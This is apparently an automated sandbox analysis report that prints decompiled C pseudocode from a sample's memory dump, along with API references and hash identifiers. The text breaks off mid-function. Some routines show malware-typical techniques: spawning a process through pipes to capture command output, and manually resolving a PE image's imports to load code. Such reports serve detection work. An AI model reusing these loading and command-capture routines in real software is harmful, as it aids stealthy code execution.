C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x100121ff
0x10012207
0x1001220c
0x1001220f
0x10012214
0x1001221a
0x10012223
0x10012227
0x10012227
0x10012223
0x10012229
0x1001222e
0x10012237
0x1001223c
0x1001223f
0x10012248
0x1001224a
0x10012251
0x10012262
0x10012262
0x10012264
0x1001226c
0x10012273
0x00000000
0x1001226e
0x10012272
0x10012272
0x10012253
0x10012253
0x10012259
0x1001225b
0x10012260
0x10012276
0x10012279
0x1001227e
0x00000000
0x00000000
0x00000000
0x10012260

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x8a40590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x8a41bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x8a407b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x8a407b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x1000cf87
0x1000cf89
0x1000cf90
0x1000cf98
0x1000cfa2
0x1000cfa2
0x1000cfa8
0x1000cfb1
0x1000cfb7
0x1000cfb9
0x1000cfbd
0x1000cfbd
0x1000cfc2
0x1000cfc8
0x1000cfd8
0x1000cfe2
0x1000cfea
0x1000cfed
0x1000cff9
0x1000cfff
0x1000d004
0x1000d00a
0x1000d010
0x1000d016
0x1000d01e

APIs

GetCurrentProcess.KERNEL32(?,?,08A40590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,08A41BD4,00000105,?,?,08A40590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(08A40590,08A40590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x8abfaa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x8abfaa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x8abfaa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x8abfaa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x8abfc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

0x1000a9c2
0x1000a9c4
0x1000a9d0
0x1000a9d5
0x1000a9d8
0x1000a9da
0x1000a9dd
0x1000a9e0
0x1000a9e7
0x1000a9ea
0x1000a9f1
0x1000a9f4
0x1000a9fe
0x1000a9ff
0x1000aa02
0x1000aa04
0x1000aa05
0x1000aa1c
0x1000ab9c
0x00000000
0x1000ab9c
0x1000aa33
0x1000ab68
0x1000ab6e
0x1000ab79
0x1000ab7b
0x1000ab83
0x1000ab83
0x1000ab8a
0x1000ab8c
0x1000ab95
0x1000ab95
0x00000000
0x1000ab98
0x1000aa39
0x1000aa3c
0x1000aa3f
0x1000aa45
0x1000aa4f
0x1000aa59
0x1000aa60
0x1000aa69
0x1000aa6b
0x1000aa71
0x00000000
0x00000000
0x1000aa7c
0x1000aa83
0x1000aa84
0x1000aa89
0x1000aa8a
0x1000aa8b
0x1000aa90
0x1000aa92
0x1000aa93
0x1000aa94
0x1000aa97
0x1000aa9d
0x00000000
0x00000000
0x1000aaa3
0x1000aaab
0x1000aaae
0x1000aab6
0x1000aab9
0x1000aabc
0x1000aac2
0x1000aad6
0x1000aadc
0x1000aae2
0x1000ab0b
0x1000aae4
0x1000aae4
0x1000aae6
0x1000aae8
0x1000aaf0
0x1000aaf8
0x1000aafd
0x1000aafd
0x1000ab11
0x1000ab13
0x1000ab13
0x1000ab1b
0x1000ab23
0x1000ab24
0x1000ab29
0x1000ab32
0x1000ab52
0x1000ab52
0x1000ab5a
0x1000ab5d
0x1000ab65
0x00000000
0x1000ab65
0x1000ab3b
0x1000ab3f
0x00000000
0x00000000
0x1000ab47
0x00000000

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x100124a1
0x100124a9
0x100124be
0x100124d0
0x100124dc
0x100124e2
0x100124e7
0x100124f3
0x1001265e
0x00000000
0x1001265e
0x100124f9
0x10012502
0x10012510
0x10012513
0x10012522
0x10012522
0x10012529
0x10012537
0x1001253a
0x10012557
0x1001255e
0x1001256e
0x10012586
0x10012570
0x10012578
0x10012578
0x10012589
0x1001258d
0x10012599
0x1001259d
0x100125a1
0x100125a5
0x100125b1
0x100125dc
0x100125e4
0x100125f6
0x10012602
0x100125b3
0x100125b8
0x100125c3
0x100125cf
0x100125cf
0x1001260b
0x10012611
0x1001261b
0x10012637
0x1001261d
0x1001262c
0x1001262c
0x1001261b
0x1001263f
0x10012648
0x10012648
0x10012656
0x00000000
0x10012656
0x10012562
0x00000000
0x10012562
0x00000000
0x1001253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

GetProcAddress, xrefs: 100124C1
kernel32.dll, xrefs: 100124B3

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x8a40590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x8a40590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x8a40590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x8a40590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x8a40590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x8abfbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x1000c4ce
0x1000c4ce
0x1000c4ce
0x1000c4d1
0x1000c4dd
0x1000c4e8
0x1000c504
0x1000c509
0x1000c512
0x1000c514
0x1000c51c
0x1000c53d
0x1000c542
0x1000c54f
0x1000c55a
0x1000c561
0x1000c568
0x1000c579
0x1000c57f
0x1000c582
0x1000c599
0x1000c5a5
0x1000c5ad
0x1000c5b4
0x1000c5ba
0x1000c5c6
0x1000c5cc
0x1000c5d3
0x1000c5e6
0x1000c5d5
0x1000c5d5
0x1000c5d8
0x1000c5de
0x1000c5e3
0x1000c5e8
0x1000c5f3
0x1000c605
0x1000c617
0x00000000
0x1000c619
0x1000c620
0x00000000
0x1000c626
0x1000c627
0x1000c627
0x1000c62e
0x1000c630
0x1000c635
0x1000c635
0x1000c63a
0x1000c63e
0x1000c63e

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

dll, xrefs: 1000C588
%08x, xrefs: 1000C52F

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
